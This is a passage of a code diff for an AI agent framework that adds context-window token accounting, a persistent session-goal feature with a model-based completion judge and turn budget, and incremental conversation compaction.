+        active_messages,
+    )
+    message_estimate_tokens = max(
+        await _estimate_messages(session_id, active_messages),
+        sum(breakdown_tokens.values()),
+    )
+    inferred_provider_id, inferred_model_id = _resolve_message_model(active_messages)
+    provider_id = provider_id or inferred_provider_id or getattr(session, "provider", None)
+    model_id = model_id or inferred_model_id or getattr(session, "model", None)
+    context_window = _resolve_context_window(provider_id, model_id)
+    tool_definition_tokens, prompt_tool_names = await _estimate_tool_definition_tokens(
+        session_id,
+        session=session,
+        messages=active_messages,
+    )
+    system_prompt_tokens = await _estimate_system_prompt_tokens(
+        session_id,
+        session=session,
+        messages=active_messages,
+        provider_id=provider_id,
+        model_id=model_id,
+        prompt_tool_names=prompt_tool_names,
+    )
+    estimated_tokens = system_prompt_tokens + tool_definition_tokens + message_estimate_tokens
+
+    latest_observed = _latest_fresh_observation(
+        active_messages,
+        latest_context_mutation_ms=max(
+            _latest_summary_message_ms(active_messages),
+            latest_compacted_part_ms,
+        ),
+    )
+
+    observed_tokens: Optional[int] = None
+    last_message_id: Optional[str] = None
+    source: UsageSource = "estimated"
+    used_tokens = estimated_tokens
+    if latest_observed is not None:
+        observed_tokens = latest_observed.used_tokens
+        last_message_id = latest_observed.message_id
+        used_tokens = max(estimated_tokens, latest_observed.used_tokens)
+        source = "observed" if used_tokens == latest_observed.used_tokens else "estimated"
+
+    percent = (
+        max(0, min(100, int(((used_tokens / context_window) * 100) + 0.5)))
+        if context_window > 0
+        else 0
+    )
+
+    segments: List[ContextUsageSegment] = []
+    segment_tokens = {
+        "systemPrompt": system_prompt_tokens,
+        "toolDefinitions": tool_definition_tokens,
+        **breakdown_tokens,
+    }
+    unattributed_tokens = used_tokens - sum(segment_tokens.values())
+    if unattributed_tokens > 0:
+        segment_tokens["conversation"] = segment_tokens.get("conversation", 0) + unattributed_tokens
+
+    for key in (
+        "systemPrompt",
+        "toolDefinitions",
+        "conversation",
+        "reasoning",
+        "tools",
+        "skillLoad",
+        "agentDelegation",
+    ):
+        tokens = segment_tokens.get(key, 0)
+        if tokens <= 0 and key not in ZERO_VISIBLE_SEGMENTS:
+            continue
+        segments.append(
+            ContextUsageSegment(
+                key=key,
+                tokens=tokens,
+                included=True,
+                source="estimated",
+            )
+        )
+
+    return ContextUsageSnapshot(
+        sessionID=session_id,
+        usedTokens=used_tokens,
+        contextWindow=context_window,
+        percent=percent,
+        source=source,
+        lastMessageID=last_message_id,
+        observedTokens=observed_tokens,
+        estimatedTokens=estimated_tokens,
+        compactedTokens=0,
+        providerID=provider_id,
+        modelID=model_id,
+        segments=segments,
+        excludedSegments=[],
+    )
+
+
+def _coerce_int(value: Any) -> int:
+    try:
+        return max(0, int(value or 0))
+    except (TypeError, ValueError):
+        return 0
+
+
+def _role_value(message: Any) -> str:
+    role = getattr(message, "role", "")
+    return getattr(role, "value", role) or ""
+
+
+def _time_created_ms(message: Any) -> int:
+    time_data = getattr(message, "time", None)
+    if isinstance(time_data, dict):
+        return _coerce_int(time_data.get("created"))
+    return _coerce_int(getattr(time_data, "created", 0))
+
+
+def _is_summary_message(message: Any) -> bool:
+    return bool(getattr(message, "summary", None)) or getattr(message, "finish", None) == "summary"
+
+
+def _latest_summary_message_ms(messages: List[Any]) -> int:
+    latest = 0
+    for message in messages:
+        if _is_summary_message(message):
+            latest = max(latest, _time_created_ms(message))
+    return latest
+
+
+def _observed_tokens_for_message(message: Any) -> Optional[_ObservedTokens]:
+    if _role_value(message) != "assistant" or _is_summary_message(message):
+        return None
+
+    data = token_usage_to_dict(getattr(message, "tokens", None))
+    cache = data.get("cache") or {}
+    prompt_tokens = _coerce_int(data.get("input")) + _coerce_int(cache.get("read"))
+    used_tokens = (
+        prompt_tokens
+        + _coerce_int(data.get("output"))
+        + _coerce_int(data.get("reasoning"))
+    )
+    if used_tokens <= 0:
+        return None
+    return _ObservedTokens(
+        message_id=getattr(message, "id", ""),
+        created_ms=_time_created_ms(message),
+        used_tokens=used_tokens,
+        prompt_tokens=prompt_tokens,
+    )
+
+
+def _latest_fresh_observation(
+    messages: List[Any],
+    *,
+    latest_context_mutation_ms: int,
+) -> Optional[_ObservedTokens]:
+    for message in reversed(messages):
+        observation = _observed_tokens_for_message(message)
+        if observation is None:
+            continue
+        if observation.created_ms and observation.created_ms < latest_context_mutation_ms:
+            return None
+        return observation
+    return None
+
+
+async def _estimate_messages(session_id: str, messages: List[Any]) -> int:
+    if not messages:
+        return 0
+    try:
+        return _coerce_int(await SessionPrompt.estimate_full_context_tokens(session_id, messages))
+    except Exception as exc:
+        log.warn("context_usage.estimate_failed", {
+            "session_id": session_id,
+            "error": str(exc),
+        })
+        return 0
+
+
+async def _estimate_system_prompt_tokens(
+    session_id: str,
+    *,
+    session: Optional[SessionInfo],
+    messages: List[Any],
+    provider_id: Optional[str],
+    model_id: Optional[str],
+    prompt_tool_names: Iterable[str] = (),
+) -> int:
+    if not provider_id or not model_id:
+        return 0
+    try:
+        from flocks.agent.registry import Agent
+        from flocks.tool.registry import ToolRegistry
+
+        agent_name = _resolve_agent_name(messages, session) or await Agent.default_agent()
+        agent = await Agent.get(agent_name)
+        if agent is None:
+            agent = await Agent.get("rex")
+
+        prompts = await SessionPrompt.build_system_prompts(
+            session_id=session_id,
+            session_directory=getattr(session, "directory", None) if session is not None else None,
+            agent_name=getattr(agent, "name", agent_name) if agent is not None else agent_name,
+            agent_prompt=getattr(agent, "prompt", None) if agent is not None else None,
+            provider_id=provider_id,
+            model_id=model_id,
+            prompt_tool_names=prompt_tool_names,
+            tool_revision=ToolRegistry.revision(),
+        )
+        return sum(SessionPrompt.count_tokens(prompt) for prompt in prompts)
+    except Exception as exc:
+        log.debug("context_usage.system_prompt_estimate_failed", {
+            "session_id": session_id,
+            "provider_id": provider_id,
+            "model_id": model_id,
+            "error": str(exc),
+        })
+        return 0
+
+
+async def _estimate_tool_definition_tokens(
+    session_id: str,
+    *,
+    session: Optional[SessionInfo],
+    messages: List[Any],
+) -> tuple[int, tuple[str, ...]]:
+    try:
+        from flocks.agent.registry import Agent
+        from flocks.agent.toolset import resolve_agent_initial_tools
+        from flocks.session.callable_schema import (
+            _resolve_dynamic_always_load_tool_names,
+            resolve_callable_tool_infos,
+        )
+        from flocks.session.callable_state import get_session_callable_tools
+        from flocks.tool.catalog import get_always_load_tool_names
+
+        agent_name = _resolve_agent_name(messages, session) or await Agent.default_agent()
+        agent = await Agent.get(agent_name)
+        if agent is None:
+            agent = await Agent.get("rex")
+
+        callable_tool_names = await get_session_callable_tools(session_id)
+        if callable_tool_names:
+            effective_tool_names = set(callable_tool_names)
+        elif agent is not None:
+            initial_tool_names, _permission_rules = resolve_agent_initial_tools(
+                getattr(agent, "tools", None),
+                getattr(agent, "permission", None),
+                getattr(agent, "name", agent_name),
+            )
+            effective_tool_names = set(initial_tool_names)
+        else:
+            effective_tool_names = set()
+
+        effective_tool_names.update(get_always_load_tool_names())
+        effective_tool_names.update(await _resolve_dynamic_always_load_tool_names())
+        tool_infos, _enabled_count = resolve_callable_tool_infos(effective_tool_names)
+
+        tools = []
+        for tool_info in tool_infos:
+            schema = tool_info.get_schema()
+            tools.append({
+                "type": "function",
+                "function": {
+                    "name": tool_info.name,
+                    "description": tool_info.description,
+                    "parameters": schema.to_json_schema(),
+                },
+            })
+        if not tools:
+            return 0, ()
+
+        prompt_tool_names = tuple(sorted(
+            str(tool.get("function", {}).get("name", "")).strip()
+            for tool in tools
+            if isinstance(tool, dict)
+        ))
+        encoded = json.dumps(tools, ensure_ascii=False, sort_keys=True)
+        return SessionPrompt.count_tokens(encoded), tuple(name for name in prompt_tool_names if name)
+    except Exception as exc:
+        log.debug("context_usage.tool_definition_estimate_failed", {
+            "session_id": session_id,
+            "error": str(exc),
+        })
+        return 0, ()
+
+
+def _resolve_agent_name(messages: List[Any], session: Optional[SessionInfo]) -> Optional[str]:
+    for message in reversed(messages):
+        agent_name = _field_value(message, "agent")
+        if agent_name:
+            return str(agent_name)
+    agent_name = getattr(session, "agent", None) if session is not None else None
+    return str(agent_name) if agent_name else None
+
+
+async def _estimate_message_breakdown(session_id: str, messages: List[Any]) -> tuple[Dict[str, int], int]:
+    tokens_by_key = {
+        "conversation": 0,
+        "reasoning": 0,
+        "tools": 0,
+        "skillLoad": 0,
+        "agentDelegation": 0,
+    }
+    latest_compacted_part_ms = 0
+    for message in messages:
+        content = _field_value(message, "content", "")
+        tokens_by_key["conversation"] += SessionPrompt.count_tokens(content or "")
+
+        message_id = _field_value(message, "id")
+        if not message_id:
+            continue
+        try:
+            parts = await Message.parts(message_id, session_id)
+        except Exception as exc:
+            log.debug("context_usage.breakdown_parts_failed", {
+                "message_id": message_id,
+                "error": str(exc),
+            })
+            continue
+
+        for part in parts:
+            part_type = _field_value(part, "type", "")
+            if part_type == "text":
+                tokens_by_key["conversation"] += SessionPrompt.count_tokens(_field_value(part, "text", "") or "")
+                continue
+            if part_type in {"reasoning", "thinking"}:
+                tokens_by_key["reasoning"] += SessionPrompt.count_tokens(_field_value(part, "text", "") or "")
+                continue
+            if part_type in {"agent", "subtask"}:
+                tokens_by_key["agentDelegation"] += _estimate_subtask_part_tokens(part)
+                continue
+            if part_type != "tool":
+                continue
+            state = _field_value(part, "state")
+            if state is None:
+                continue
+            latest_compacted_part_ms = max(
+                latest_compacted_part_ms,
+                _compacted_time_ms(state),
+            )
+            tokens_by_key[_context_key_for_tool(_tool_name_for_part(part))] += _estimate_tool_state_tokens(state)
+    return tokens_by_key, latest_compacted_part_ms
+
+
+def _field_value(value: Any, field: str, default: Any = None) -> Any:
+    if isinstance(value, dict):
+        return value.get(field, default)
+    return getattr(value, field, default)
+
+
+def _mapping_value(value: Any, *fields: str) -> Any:
+    if not isinstance(value, dict):
+        return None
+    for field in fields:
+        field_value = value.get(field)
+        if field_value:
+            return field_value
+    return None
+
+
+def _tool_name_for_part(part: Any) -> str:
+    direct = _field_value(part, "tool", "")
+    if direct:
+        return str(direct)
+
+    tool_name_fields = ("tool", "toolName", "tool_name", "name")
+    metadata_name = _mapping_value(_field_value(part, "metadata"), *tool_name_fields)
+    if metadata_name:
+        return str(metadata_name)
+
+    state = _field_value(part, "state")
+    state_metadata_name = _mapping_value(_field_value(state, "metadata"), *tool_name_fields)
+    if state_metadata_name:
+        return str(state_metadata_name)
+
+    return ""
+
+
+def _context_key_for_tool(tool_name: str) -> str:
+    if tool_name == "skill_load":
+        return "skillLoad"
+    if tool_name in DELEGATION_TOOLS:
+        return "agentDelegation"
+    return "tools"
+
+
+def _estimate_subtask_part_tokens(part: Any) -> int:
+    total = 0
+    for field in ("prompt", "description", "name"):
+        value = _field_value(part, field, "")
+        total += SessionPrompt.count_tokens(value if isinstance(value, str) else str(value or ""))
+    source = _field_value(part, "source")
+    if source:
+        total += SessionPrompt.count_tokens(source if isinstance(source, str) else str(source))
+    return total
+
+
+def _estimate_tool_state_tokens(state: Any) -> int:
+    total = 0
+    tool_input = _field_value(state, "input")
+    if tool_input:
+        total += SessionPrompt.count_tokens(
+            tool_input if isinstance(tool_input, str) else str(tool_input)
+        )
+
+    if _compacted_time_ms(state) > 0:
+        return total + 10
+
+    tool_output = _field_value(state, "output")
+    if tool_output:
+        total += SessionPrompt.count_tokens(
+            tool_output if isinstance(tool_output, str) else str(tool_output)
+        )
+    return total
+
+
+def _compacted_time_ms(state: Any) -> int:
+    time_info = _field_value(state, "time")
+    if not isinstance(time_info, dict):
+        return 0
+    return _coerce_int(time_info.get("compacted"))
+
+
+def _resolve_message_model(messages: List[Any]) -> tuple[Optional[str], Optional[str]]:
+    for message in reversed(messages):
+        role = _role_value(message)
+        if role == "assistant":
+            provider_id = getattr(message, "providerID", None)
+            model_id = getattr(message, "modelID", None)
+            if provider_id and model_id:
+                return provider_id, model_id
+        if role == "user":
+            model = getattr(message, "model", None)
+            if isinstance(model, dict):
+                provider_id = model.get("providerID") or model.get("provider_id")
+                model_id = model.get("modelID") or model.get("model_id")
+                if provider_id and model_id:
+                    return provider_id, model_id
+    return None, None
+
+
+def _resolve_context_window(provider_id: Optional[str], model_id: Optional[str]) -> int:
+    if not provider_id or not model_id:
+        return 0
+    try:
+        context_window, _max_output, _max_input = Provider.resolve_model_info(provider_id, model_id)
+        return _coerce_int(context_window)
+    except Exception as exc:
+        log.debug("context_usage.resolve_window_failed", {
+            "provider_id": provider_id,
+            "model_id": model_id,
+            "error": str(exc),
+        })
+        return 0
diff --git a/flocks/session/goal.py b/flocks/session/goal.py
new file mode 100644
index 000000000..29c1b5b80
--- /dev/null
+++ b/flocks/session/goal.py
@@ -0,0 +1,420 @@
+"""Persistent session goals."""
+
+from __future__ import annotations
+
+import json
+import time
+from dataclasses import dataclass
+from typing import Literal, Optional
+
+from pydantic import BaseModel, Field
+
+from flocks.provider.options import build_provider_options
+from flocks.provider.provider import ChatMessage, Provider
+from flocks.storage.storage import Storage
+from flocks.utils.log import Log
+
+
+log = Log.create(service="session.goal")
+
+DEFAULT_GOAL_MAX_TURNS = 20
+JUDGE_RESPONSE_MAX_CHARS = 4096
+JUDGE_MAX_TOKENS = 4096
+GOAL_CLARIFICATION_MAX_CHARS = 2000
+GoalStatus = Literal["active", "paused", "completed", "blocked"]
+GoalVerdict = Literal["complete", "blocked", "continue", "waiting", "inactive"]
+
+_MODEL_JUDGE_SYSTEM_PROMPT = """You are a strict goal completion judge.
+
+Return only valid JSON with exactly this shape:
+{"verdict": "complete|blocked|waiting|continue", "reason": "one sentence"}
+
+Judging rules:
+- verdict=complete only if the assistant's latest final response explicitly confirms the goal is complete or the requested deliverable is clearly produced.
+- verdict=blocked only if the latest response clearly says the goal cannot be completed and gives the specific blocker.
+- verdict=waiting if the assistant asks the user for more input, clarification, confirmation, approval, credentials, or any other user action before work can continue.
+- verdict=continue if work remains and the assistant can keep taking concrete steps without user input.
+- The reason must be concise and grounded only in the provided goal, user clarification, and latest response.
+- Keep the entire JSON response under 200 characters.
+- Do not include markdown, code fences, or any text outside the JSON object.
+"""
+
+
+class GoalClarificationAnswer(BaseModel):
+    question: str
+    answer: str
+
+
+class GoalClarification(BaseModel):
+    answers: list[GoalClarificationAnswer]
+    text: str
+    created_at: float = Field(default_factory=time.time)
+    message_id: Optional[str] = None
+    call_id: Optional[str] = None
+
+
+class GoalState(BaseModel):
+    objective: str
+    status: GoalStatus = "active"
+    turns_used: int = 0
+    max_turns: int = DEFAULT_GOAL_MAX_TURNS
+    created_at: float = Field(default_factory=time.time)
+    updated_at: float = Field(default_factory=time.time)
+    last_verdict: Optional[GoalVerdict] = None
+    last_reason: Optional[str] = None
+    paused_reason: Optional[str] = None
+    initial_clarification: Optional[GoalClarification] = None
+
+
+@dataclass
+class GoalDecision:
+    status: GoalStatus | None
+    verdict: GoalVerdict
+    should_continue: bool = False
+    continuation_prompt: Optional[str] = None
+    reason: str = ""
+    objective: Optional[str] = None
+
+
+def _goal_key(session_id: str) -> str:
+    return f"goal:{session_id}"
+
+
+def _now() -> float:
+    return time.time()
+
+
+def _trim_reason(text: str, max_chars: int = 240) -> str:
+    normalized = " ".join((text or "").split())
+    if len(normalized) <= max_chars:
+        return normalized
+    return normalized[: max_chars - 3].rstrip() + "..."
+
+
+def _judge_input(last_response: str) -> str:
+    text = last_response or ""
+    if len(text) <= JUDGE_RESPONSE_MAX_CHARS:
+        return text
+    return text[-JUDGE_RESPONSE_MAX_CHARS:]
+
+
+def _truncate_text(text: str, max_chars: int) -> str:
+    normalized = " ".join((text or "").split())
+    if len(normalized) <= max_chars:
+        return normalized
+    return normalized[: max_chars - 3].rstrip() + "..."
+
+
+def _format_goal_context(objective: str, clarification: Optional[GoalClarification]) -> str:
+    if clarification is None or not clarification.text.strip():
+        return objective
+    return (
+        f"Original goal:\n{objective}\n\n"
+        "Initial user clarification:\n"
+        f"{clarification.text}"
+    )
+
+
+def _format_answer(answer: object) -> str:
+    if isinstance(answer, list):
+        return ", ".join(str(item).strip() for item in answer if str(item).strip())
+    return str(answer or "").strip()
+
+
+def _build_clarification(
+    questions: list[dict],
+    answers: list[list[str]],
+    *,
+    message_id: Optional[str] = None,
+    call_id: Optional[str] = None,
+) -> Optional[GoalClarification]:
+    items: list[GoalClarificationAnswer] = []
+    lines: list[str] = []
+    for index, question in enumerate(questions):
+        question_text = str(question.get("question") or "").strip()
+        answer_text = _format_answer(answers[index] if index < len(answers) else [])
+        if not question_text and not answer_text:
+            continue
+        if not question_text:
+            question_text = f"Question {index + 1}"
+        if not answer_text:
+            answer_text = "Unanswered"
+        items.append(GoalClarificationAnswer(question=question_text, answer=answer_text))
+        lines.append(f'Q: {question_text}\nA: {answer_text}')
+
+    if not items:
+        return None
+
+    return GoalClarification(
+        answers=items,
+        text=_truncate_text("\n\n".join(lines), GOAL_CLARIFICATION_MAX_CHARS),
+        message_id=message_id,
+        call_id=call_id,
+    )
+
+
+def _extract_json_object(text: str) -> dict:
+    """Parse a strict JSON object."""
+    raw = (text or "").strip()
+    if not raw:
+        raise ValueError("empty judge response")
+
+    try:
+        payload = json.loads(raw)
+    except json.JSONDecodeError as exc:
+        raise ValueError(f"judge response was not strict JSON: {_trim_reason(raw)!r}") from exc
+    if not isinstance(payload, dict):
+        raise ValueError("judge response is not a JSON object")
+    return payload
+
+
+async def judge_goal_with_model(
+    objective: str,
+    last_response: str,
+    *,
+    provider_id: str,
+    model_id: str,
+    initial_clarification: Optional[GoalClarification] = None,
+) -> tuple[GoalVerdict, str]:
+    """Hermes-style model judge using the active session provider/model."""
+    provider = Provider.get(provider_id)
+    if provider is None:
+        raise RuntimeError(f"provider not found: {provider_id}")
+
+    provider_options = build_provider_options(provider_id, model_id)
+    provider_options.pop("max_tokens", None)
+
+    response = await provider.chat(
+        model_id=model_id,
+        messages=[
+            ChatMessage(role="system", content=_MODEL_JUDGE_SYSTEM_PROMPT),
+            ChatMessage(
+                role="user",
+                content=(
+                    f"Goal:\n{_format_goal_context(objective, initial_clarification)}\n\n"
+                    "Latest assistant final response (truncated to the last 4KB):\n"
+                    f"{_judge_input(last_response)}"
+                ),
+            ),
+        ],
+        **provider_options,
+        max_tokens=JUDGE_MAX_TOKENS,
+        temperature=0,
+    )
+
+    payload = _extract_json_object(response.content)
+    verdict = str(payload.get("verdict") or "").strip().lower()
+    reason = _trim_reason(str(payload.get("reason") or ""))
+    if verdict not in {"complete", "blocked", "waiting", "continue"}:
+        raise ValueError("judge JSON field 'verdict' must be one of complete, blocked, waiting, continue")
+    if not reason:
+        reason = "model judge returned no reason"
+
+    return verdict, reason
+
+
+class GoalManager:
+    """Session-scoped goal state and continuation policy."""
+
+    @classmethod
+    async def get(cls, session_id: str) -> Optional[GoalState]:
+        try:
+            data = await Storage.get(_goal_key(session_id))
+        except Exception as exc:
+            log.warn("goal.get.error", {"session_id": session_id, "error": str(exc)})
+            return None
+        if not data:
+            return None
+        try:
+            return GoalState(**data)
+        except Exception as exc:
+            log.warn("goal.get.invalid", {"session_id": session_id, "error": str(exc)})
+            return None
+
+    @classmethod
+    async def save(cls, session_id: str, state: GoalState) -> GoalState:
+        state.updated_at = _now()
+        await Storage.set(_goal_key(session_id), state.model_dump(exclude_none=True), "goal")
+        return state
+
+    @classmethod
+    async def clear(cls, session_id: str) -> bool:
+        """Remove any persisted goal state for a session."""
+        try:
+            return await Storage.delete(_goal_key(session_id))
+        except Exception as exc:
+            log.warn("goal.clear.error", {"session_id": session_id, "error": str(exc)})
+            return False
+
+    @classmethod
+    async def set_goal(
+        cls,
+        session_id: str,
+        objective: str,
+        *,
+        max_turns: int = DEFAULT_GOAL_MAX_TURNS,
+    ) -> GoalState:
+        objective = (objective or "").strip()
+        if not objective:
+            raise ValueError("goal text is empty")
+        state = GoalState(
+            objective=objective,
+            status="active",
+            turns_used=0,
+            max_turns=max_turns if max_turns > 0 else DEFAULT_GOAL_MAX_TURNS,
+        )
+        return await cls.save(session_id, state)
+
+    @classmethod
+    async def record_initial_clarification(
+        cls,
+        session_id: str,
+        questions: list[dict],
+        answers: list[list[str]],
+        *,
+        message_id: Optional[str] = None,
+        call_id: Optional[str] = None,
+    ) -> Optional[GoalState]:
+        """Persist the first successful user clarification for an active goal."""
+        state = await cls.get(session_id)
+        if state is None or state.status != "active" or state.initial_clarification is not None:
+            return state
+
+        clarification = _build_clarification(
+            questions,
+            answers,
+            message_id=message_id,
+            call_id=call_id,
+        )
+        if clarification is None:
+            return state
+
+        state.initial_clarification = clarification
+        return await cls.save(session_id, state)
+
+    @classmethod
+    def goal_prompt(cls, objective: str) -> str:
+        return (
+            "[Goal mode]\n"
+            f"Active goal: {objective}\n\n"
+            "If the active goal is ambiguous or underspecified, ask the user a "
+            "clarifying question using the question tool and wait for the answer "
+            "instead of continuing autonomously. "
+            "Work toward the active goal. Continue taking concrete steps until the goal "
+            "is complete or blocked. In your final response, make the current outcome "
+            "clear with evidence of completed work or the specific blocker."
+        )
+
+    @classmethod
+    def continuation_prompt(cls, state: GoalState, reason: str) -> str:
+        reason = reason or "goal is still active"
+        clarification = (
+            "\nInitial user clarification:\n"
+            f"{state.initial_clarification.text}\n"
+            if state.initial_clarification is not None and state.initial_clarification.text.strip()
+            else ""
+        )
+        return (
+            "[Continuing toward active goal]\n"
+            f"Goal: {state.objective}\n"
+            f"{clarification}"
+            f"Reason to continue: {reason}\n\n"
+            "Take the next concrete step. If the goal is complete or blocked, make "
+            "that outcome clear with evidence or the specific blocker."
+        )
+
+    @classmethod
+    async def evaluate_after_turn(
+        cls,
+        session_id: str,
+        last_response: str,
+        *,
+        pending_user_input: bool = False,
+        provider_id: Optional[str] = None,
+        model_id: Optional[str] = None,
+    ) -> GoalDecision:
+        state = await cls.get(session_id)
+        if state is None or state.status != "active":
+            return GoalDecision(
+                status=state.status if state else None,
+                verdict="inactive",
+                objective=state.objective if state else None,
+            )
+
+        state.turns_used += 1
+        if pending_user_input:
+            verdict = "waiting"
+            reason = "session has a pending user question"
+        elif provider_id and model_id:
+            try:
+                verdict, reason = await judge_goal_with_model(
+                    state.objective,
+                    last_response,
+                    provider_id=provider_id,
+                    model_id=model_id,
+                    initial_clarification=state.initial_clarification,
+                )
+            except Exception as exc:
+                log.warn("goal.model_judge.failed", {
+                    "session_id": session_id,
+                    "provider_id": provider_id,
+                    "model_id": model_id,
+                    "error": str(exc),
+                })
+                verdict = "waiting"
+                reason = "goal judge failed; waiting instead of continuing autonomously"
+        else:
+            verdict = "waiting"
+            reason = "goal judge unavailable; waiting instead of continuing autonomously"
+        state.last_verdict = verdict
+        state.last_reason = reason
+
+        if verdict == "complete":
+            state.status = "completed"
+            await cls.save(session_id, state)
+            return GoalDecision(
+                status=state.status,
+                verdict=verdict,
+                reason=reason,
+                objective=state.objective,
+            )
+
+        if verdict == "blocked":
+            state.status = "blocked"
+            await cls.save(session_id, state)
+            return GoalDecision(
+                status=state.status,
+                verdict=verdict,
+                reason=reason,
+                objective=state.objective,
+            )
+
+        if verdict == "waiting":
+            await cls.save(session_id, state)
+            return GoalDecision(
+                status=state.status,
+                verdict=verdict,
+                reason=reason,
+                objective=state.objective,
+            )
+
+        if state.turns_used >= state.max_turns:
+            state.status = "paused"
+            state.paused_reason = f"turn budget exhausted ({state.turns_used}/{state.max_turns})"
+            await cls.save(session_id, state)
+            return GoalDecision(
+                status=state.status,
+                verdict="continue",
+                reason=state.paused_reason,
+                objective=state.objective,
+            )
+
+        await cls.save(session_id, state)
+        return GoalDecision(
+            status=state.status,
+            verdict="continue",
+            should_continue=True,
+            continuation_prompt=cls.continuation_prompt(state, reason),
+            reason=reason,
+            objective=state.objective,
+        )
diff --git a/flocks/session/interaction_queue.py b/flocks/session/interaction_queue.py
index 92ab2242c..b92464f9e 100644
--- a/flocks/session/interaction_queue.py
+++ b/flocks/session/interaction_queue.py
@@ -29,6 +29,7 @@ class QueuedPrompt(BaseModel):
     agent: Optional[str] = None
     model: Optional[Dict[str, Any]] = None
     variant: Optional[str] = None
+    display_text: Optional[str] = None
     messageID: Optional[str] = None
     noReply: Optional[bool] = None
     mockReply: Optional[str] = None
@@ -62,6 +63,7 @@ async def enqueue(
         agent: Optional[str] = None,
         model: Optional[Dict[str, Any]] = None,
         variant: Optional[str] = None,
+        display_text: Optional[str] = None,
         message_id: Optional[str] = None,
         no_reply: Optional[bool] = None,
         mock_reply: Optional[str] = None,
@@ -79,6 +81,7 @@ async def enqueue(
                 agent=agent,
                 model=dict(model) if isinstance(model, dict) else model,
                 variant=variant,
+                display_text=display_text,
                 messageID=message_id,
                 noReply=no_reply,
                 mockReply=mock_reply,
@@ -114,6 +117,7 @@ async def update_text(cls, session_id: str, item_id: str, text: str) -> QueuedPr
                 parts.insert(0, {"type": "text", "text": text})
 
             item.parts = parts
+            item.display_text = None
             item.updatedAt = int(time.time() * 1000)
             return item.model_copy(deep=True)
 
diff --git a/flocks/session/lifecycle/compaction/compaction.py b/flocks/session/lifecycle/compaction/compaction.py
index 5fcb10e55..7e614b6d8 100644
--- a/flocks/session/lifecycle/compaction/compaction.py
+++ b/flocks/session/lifecycle/compaction/compaction.py
@@ -16,15 +16,6 @@
 from dataclasses import dataclass, field
 from typing import Awaitable, Callable, List, Optional, Dict, Any, Literal
 
-# Optional progress sink injected by the route layer so the front-end can
-# render a multi-stage "Compacting..." panel instead of a 30–60 s opaque
-# spinner.  Kept dependency-free: the callback signature is just
-# ``(stage, data) -> Awaitable[None]``.  Producers MUST tolerate a
-# ``None`` callback (silent / no-op) and any exception raised by the
-# sink — progress reporting is observability, never a correctness
-# contract for compaction itself.  See ``_emit_progress`` below.
-ProgressCallback = Callable[[str, Dict[str, Any]], Awaitable[None]]
-
 from flocks.utils.log import Log
 from flocks.session.prompt import SessionPrompt
 from .policy import CompactionPolicy
@@ -38,6 +29,15 @@
 
 log = Log.create(service="session.compaction")
 
+# Optional progress sink injected by the route layer so the front-end can
+# render a multi-stage "Compacting..." panel instead of a 30–60 s opaque
+# spinner.  Kept dependency-free: the callback signature is just
+# ``(stage, data) -> Awaitable[None]``.  Producers MUST tolerate a
+# ``None`` callback (silent / no-op) and any exception raised by the
+# sink — progress reporting is observability, never a correctness
+# contract for compaction itself.  See ``_emit_progress`` below.
+ProgressCallback = Callable[[str, Dict[str, Any]], Awaitable[None]]
+
 
 # ---------------------------------------------------------------------------
 # Iterative summary state (E1 — see docs/design/context-compaction-v2.md §E1)
@@ -1024,6 +1024,7 @@ async def process(
         # caller supplied a custom prompt (e.g. ``/compact <focus>``),
         # which we honour verbatim.  Every Nth compaction the cached
         # summary is dropped to force a full rebuild and prevent drift.
+        force_full_rebuild = False
         if not custom_prompt:
             previous_summary, prior_compaction_count = _get_iterative_summary_state(session_id)
             if _should_force_full_rebuild(prior_compaction_count):
@@ -1032,6 +1033,7 @@ async def process(
                     "compaction_count": prior_compaction_count,
                     "rebuild_interval": ITERATIVE_SUMMARY_REBUILD_INTERVAL,
                 })
+                force_full_rebuild = True
                 previous_summary = None
         else:
             previous_summary, prior_compaction_count = None, 0
@@ -1044,13 +1046,66 @@ async def process(
             log.warn("compaction.process.load_parts_error", {"error": str(e)})
             msgs_with_parts = []
 
+        summary_msgs_with_parts = [
+            msg for msg in msgs_with_parts
+            if not cls._is_compaction_control_message(msg)
+        ]
+        summary_input_mode = "full_active"
+        previous_summary_source = "cache" if previous_summary else "none"
+
+        if not custom_prompt and not force_full_rebuild:
+            latest_summary_idx, persisted_previous_summary = cls._latest_summary_boundary(
+                msgs_with_parts,
+            )
+            if latest_summary_idx >= 0 and persisted_previous_summary:
+                previous_summary = persisted_previous_summary
+                previous_summary_source = "latest_summary_message"
+                delta_msgs = [
+                    msg for msg in msgs_with_parts[latest_summary_idx + 1:]
+                    if not cls._is_summary_message(msg)
+                    and not cls._is_compaction_control_message(msg)
+                ]
+                if not delta_msgs:
+                    log.info("compaction.process.skipped_no_delta", {
+                        "session_id": session_id,
+                        "latest_summary_index": latest_summary_idx,
+                        "with_parts_count": len(msgs_with_parts),
+                    })
+                    await _emit_progress(progress_callback, "load", {
+                        "message_count": 0,
+                        "total_chars": 0,
+                    })
+                    await _emit_progress(progress_callback, "complete", {
+                        "result": "skipped_no_new_messages",
+                    })
+                    history.total_skipped += 1
+                    return "skipped"
+                summary_msgs_with_parts = delta_msgs
+                summary_input_mode = "delta_after_latest_summary"
+
+        if not summary_msgs_with_parts:
+            log.info("compaction.process.skipped_no_summary_input", {
+                "session_id": session_id,
+                "with_parts_count": len(msgs_with_parts),
+                "input_mode": summary_input_mode,
+            })
+            await _emit_progress(progress_callback, "load", {
+                "message_count": 0,
+                "total_chars": 0,
+            })
+            await _emit_progress(progress_callback, "complete", {
+                "result": "skipped_no_summary_input",
+            })
+            history.total_skipped += 1
+            return "skipped"
+
         # Extract once; keep the original (un-pruned) list for memory flush
         # so daily memory extraction sees the full content density of every
         # turn.  Only the *summary LLM* path gets the hermes-style pruned
         # view — collapsing old tool outputs to a 1-line placeholder is
         # the wrong input for a fact extractor.
         original_chat_messages = cls._extract_chat_messages(
-            msgs_with_parts, ChatMessage, session_id, policy,
+            summary_msgs_with_parts, ChatMessage, session_id, policy,
         )
 
         # Hermes-style pre-prune: MD5 dedup + compress large old messages to
@@ -1065,8 +1120,11 @@ async def process(
             "session_id": session_id,
             "raw_count": len(messages),
             "with_parts_count": len(msgs_with_parts),
+            "summary_with_parts_count": len(summary_msgs_with_parts),
             "chat_messages_count": len(chat_messages),
             "total_chars": loaded_total_chars,
+            "input_mode": summary_input_mode,
+            "previous_summary_source": previous_summary_source,
         })
         await _emit_progress(progress_callback, "load", {
             "message_count": len(chat_messages),
@@ -1503,6 +1561,59 @@ def _strip_tool_content(cls, raw: str, limit: int) -> str:
             + text[-tail_budget:]
         )
 
+    @classmethod
+    def _message_text_from_parts(cls, parts: list) -> str:
